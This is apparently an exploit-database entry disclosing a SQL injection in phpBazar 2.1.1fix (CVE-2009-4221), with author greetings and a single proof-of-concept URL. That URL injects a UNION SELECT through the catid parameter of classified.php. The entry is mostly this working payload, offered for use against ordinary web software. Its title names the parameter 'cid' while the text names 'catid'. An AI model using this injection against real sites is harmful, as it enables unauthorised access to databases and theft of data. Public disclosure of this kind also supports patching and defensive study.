phpBazar 2.1.1fix - 'cid' SQL Injection
Author: MizoZ
type: webapps
platform: php
date_added: 2009-11-27
verified: 1
codes: OSVDB-60844; CVE-2009-4221
raw file: 10245.txt
/*
Author : MizoZ [from MA]
Group  : EvilWay, evilway[at]mail[dot]com
Email  : mizozx[at]gmail[dot]com
Greetz : Zuka, Dyle !! MABROOK L3IIIIIIIIIID
*/

The vulnerability is in the $_GET['catid'], exploit:

http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--